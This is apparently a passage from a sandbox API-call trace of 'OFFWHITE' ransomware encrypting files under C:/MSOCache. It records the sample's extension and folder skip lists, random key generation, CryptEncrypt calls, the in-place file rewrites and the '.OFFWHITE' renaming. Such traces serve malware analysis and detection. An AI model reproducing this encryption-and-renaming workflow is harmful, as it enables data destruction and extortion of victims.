Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" [0086.398] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.398] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.398] PathFindExtensionW (pszPath="setup.chm") returned=".chm" [0086.398] lstrcmpiW (lpString1=".chm", lpString2=".exe") returned -1 [0086.398] lstrcmpiW (lpString1=".chm", lpString2=".log") returned -1 [0086.398] lstrcmpiW (lpString1=".chm", lpString2=".cab") returned 1 [0086.398] lstrcmpiW (lpString1=".chm", lpString2=".cmd") returned -1 [0086.398] lstrcmpiW (lpString1=".chm", lpString2=".com") returned -1 [0086.398] lstrcmpiW (lpString1=".chm", lpString2=".cpl") returned -1 [0086.398] lstrcmpiW (lpString1=".chm", lpString2=".ini") returned -1 [0086.398] lstrcmpiW (lpString1=".chm", lpString2=".dll") returned -1 [0086.398] lstrcmpiW (lpString1=".chm", lpString2=".url") returned -1 [0086.398] lstrcmpiW (lpString1=".chm", lpString2=".ttf") returned -1 [0086.398] lstrcmpiW (lpString1=".chm", lpString2=".mp3") returned -1 [0086.398] lstrcmpiW (lpString1=".chm", lpString2=".pif") returned -1 [0086.398] lstrcmpiW (lpString1=".chm", lpString2=".mp4") returned -1 [0086.398] lstrcmpiW (lpString1=".chm", lpString2=".OFFWHITE") returned -1 [0086.398] lstrcmpiW (lpString1=".chm", lpString2=".msi") returned -1 [0086.398] lstrcmpiW (lpString1="setup.chm", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0086.398] GetProcessHeap () returned 0x500000 [0086.398] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547c98 [0086.398] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0086.399] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=67190) returned 1 [0086.399] GetProcessHeap () returned 0x500000 [0086.399] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0086.399] GetProcessHeap () returned 0x500000 [0086.399] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0086.399] GetProcessHeap () returned 0x500000 [0086.399] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0086.399] GetProcessHeap () returned 0x500000 [0086.399] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0086.399] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.399] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.399] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0086.399] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.399] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.399] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0086.399] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.399] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.399] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e310*=0x100) returned 1 [0086.400] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.400] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.400] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0086.400] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x10676, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.400] SetLastError (dwErrCode=0x0) [0086.400] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0086.440] GetLastError () returned 0x0 [0086.440] GetLastError () returned 0x0 [0086.440] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x10776, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.440] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0086.440] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x10876, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.440] WriteFile (in: hFile=0x21c, lpBuffer=0x547c98*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547c98*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0086.440] GetProcessHeap () returned 0x500000 [0086.440] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10676) returned 0x5557b0 [0086.441] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.441] ReadFile (in: hFile=0x21c, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x10676, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295e540*=0x10676, lpOverlapped=0x0) returned 1 [0086.480] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.480] WriteFile (in: hFile=0x21c, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x10676, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295e54c*=0x10676, lpOverlapped=0x0) returned 1 [0086.480] GetProcessHeap () returned 0x500000 [0086.480] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0086.480] CloseHandle (hObject=0x21c) returned 1 [0086.482] GetProcessHeap () returned 0x500000 [0086.482] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0086.482] GetProcessHeap () returned 0x500000 [0086.482] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0086.482] GetProcessHeap () returned 0x500000 [0086.482] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0086.482] GetProcessHeap () returned 0x500000 [0086.482] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0086.482] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" [0086.482] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.OFFWHITE" [0086.482] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.offwhite")) returned 1 [0086.483] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2488, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0086.483] lstrcmpiW (lpString1="Setup.xml", lpString2=".") returned 1 [0086.483] lstrcmpiW (lpString1="Setup.xml", lpString2="..") returned 1 [0086.483] lstrcmpiW (lpString1="Setup.xml", lpString2="...") returned 1 [0086.483] lstrcmpiW (lpString1="Setup.xml", lpString2="windows") returned -1 [0086.483] lstrcmpiW (lpString1="Setup.xml", lpString2="$recycle.bin") returned 1 [0086.483] lstrcmpiW (lpString1="Setup.xml", lpString2="rsa") returned 1 [0086.483] lstrcmpiW (lpString1="Setup.xml", lpString2="ntuser.dat") returned 1 [0086.483] lstrcmpiW (lpString1="Setup.xml", lpString2="programdata") returned 1 [0086.483] lstrcmpiW (lpString1="Setup.xml", lpString2="appdata") returned 1 [0086.483] lstrcmpiW (lpString1="Setup.xml", lpString2="program files") returned 1 [0086.483] lstrcmpiW (lpString1="Setup.xml", lpString2="program files (x86)") returned 1 [0086.483] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" [0086.483] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\", lpString2="Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" [0086.483] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.483] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.483] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0086.483] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0086.483] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0086.483] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0086.483] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0086.483] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0086.483] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0086.483] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0086.483] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0086.483] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0086.483] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0086.483] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0086.483] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0086.484] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0086.484] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0086.484] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0086.484] lstrcmpiW (lpString1="Setup.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0086.484] GetProcessHeap () returned 0x500000 [0086.484] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547ca8 [0086.484] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0086.484] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=9352) returned 1 [0086.484] GetProcessHeap () returned 0x500000 [0086.484] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0086.484] GetProcessHeap () returned 0x500000 [0086.484] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0086.484] GetProcessHeap () returned 0x500000 [0086.484] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0086.484] GetProcessHeap () returned 0x500000 [0086.484] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0086.484] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.484] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.484] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0086.484] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.484] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.484] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0086.484] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.484] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.485] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e310*=0x100) returned 1 [0086.485] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.485] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.485] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0086.485] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x2488, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.485] SetLastError (dwErrCode=0x0) [0086.485] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0086.494] GetLastError () returned 0x0 [0086.494] GetLastError () returned 0x0 [0086.494] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x2588, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.494] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0086.494] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x2688, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.494] WriteFile (in: hFile=0x21c, lpBuffer=0x547ca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547ca8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0086.495] GetProcessHeap () returned 0x500000 [0086.495] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x2488) returned 0x5557b0 [0086.495] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.495] ReadFile (in: hFile=0x21c, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x2488, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295e540*=0x2488, lpOverlapped=0x0) returned 1 [0086.554] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.554] WriteFile (in: hFile=0x21c, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x2488, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295e54c*=0x2488, lpOverlapped=0x0) returned 1 [0086.554] GetProcessHeap () returned 0x500000 [0086.555] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0086.555] CloseHandle (hObject=0x21c) returned 1 [0086.557] GetProcessHeap () returned 0x500000 [0086.557] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0086.557] GetProcessHeap () returned 0x500000 [0086.557] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0086.557] GetProcessHeap () returned 0x500000 [0086.557] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0086.557] GetProcessHeap () returned 0x500000 [0086.557] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0086.557] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" [0086.557] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" [0086.557] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.offwhite")) returned 1 [0086.558] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x131a1c00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x131a1c00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="ShellUI.MST", cAlternateFileName="")) returned 1 [0086.558] lstrcmpiW (lpString1="ShellUI.MST", lpString2=".") returned 1 [0086.558] lstrcmpiW (lpString1="ShellUI.MST", lpString2="..") returned 1 [0086.558] lstrcmpiW (lpString1="ShellUI.MST", lpString2="...") returned 1 [0086.558] lstrcmpiW (lpString1="ShellUI.MST", lpString2="windows") returned -1 [0086.558] lstrcmpiW (lpString1="ShellUI.MST", lpString2="$recycle.bin") returned 1 [0086.558] lstrcmpiW (lpString1="ShellUI.MST", lpString2="rsa") returned 1 [0086.558] lstrcmpiW (lpString1="ShellUI.MST", lpString2="ntuser.dat") returned 1 [0086.558] lstrcmpiW (lpString1="ShellUI.MST", lpString2="programdata") returned 1 [0086.558] lstrcmpiW (lpString1="ShellUI.MST", lpString2="appdata") returned 1 [0086.558] lstrcmpiW (lpString1="ShellUI.MST", lpString2="program files") returned 1 [0086.558] lstrcmpiW (lpString1="ShellUI.MST", lpString2="program files (x86)") returned 1 [0086.558] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" [0086.558] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\", lpString2="ShellUI.MST" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" [0086.558] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.558] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.558] PathFindExtensionW (pszPath="ShellUI.MST") returned=".MST" [0086.558] lstrcmpiW (lpString1=".MST", lpString2=".exe") returned 1 [0086.558] lstrcmpiW (lpString1=".MST", lpString2=".log") returned 1 [0086.558] lstrcmpiW (lpString1=".MST", lpString2=".cab") returned 1 [0086.559] lstrcmpiW (lpString1=".MST", lpString2=".cmd") returned 1 [0086.559] lstrcmpiW (lpString1=".MST", lpString2=".com") returned 1 [0086.559] lstrcmpiW (lpString1=".MST", lpString2=".cpl") returned 1 [0086.559] lstrcmpiW (lpString1=".MST", lpString2=".ini") returned 1 [0086.559] lstrcmpiW (lpString1=".MST", lpString2=".dll") returned 1 [0086.559] lstrcmpiW (lpString1=".MST", lpString2=".url") returned -1 [0086.559] lstrcmpiW (lpString1=".MST", lpString2=".ttf") returned -1 [0086.559] lstrcmpiW (lpString1=".MST", lpString2=".mp3") returned 1 [0086.559] lstrcmpiW (lpString1=".MST", lpString2=".pif") returned -1 [0086.559] lstrcmpiW (lpString1=".MST", lpString2=".mp4") returned 1 [0086.559] lstrcmpiW (lpString1=".MST", lpString2=".OFFWHITE") returned -1 [0086.559] lstrcmpiW (lpString1=".MST", lpString2=".msi") returned 1 [0086.559] lstrcmpiW (lpString1="ShellUI.MST", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0086.559] GetProcessHeap () returned 0x500000 [0086.559] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547cb8 [0086.559] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0086.560] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=3584) returned 1 [0086.560] GetProcessHeap () returned 0x500000 [0086.560] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0086.560] GetProcessHeap () returned 0x500000 [0086.560] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0086.560] GetProcessHeap () returned 0x500000 [0086.560] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0086.560] GetProcessHeap () returned 0x500000 [0086.560] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0086.560] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.560] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.560] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0086.560] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.560] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.560] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0086.560] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.560] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.560] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e310*=0x100) returned 1 [0086.561] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.561] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.561] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0086.561] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xe00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.561] SetLastError (dwErrCode=0x0) [0086.561] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0086.572] GetLastError () returned 0x0 [0086.572] GetLastError () returned 0x0 [0086.572] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xf00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.572] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0086.572] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.572] WriteFile (in: hFile=0x21c, lpBuffer=0x547cb8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547cb8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0086.572] GetProcessHeap () returned 0x500000 [0086.572] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xe00) returned 0x5557b0 [0086.572] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.572] ReadFile (in: hFile=0x21c, lpBuffer=0x5557b0, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295e540*=0xe00, lpOverlapped=0x0) returned 1 [0086.573] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 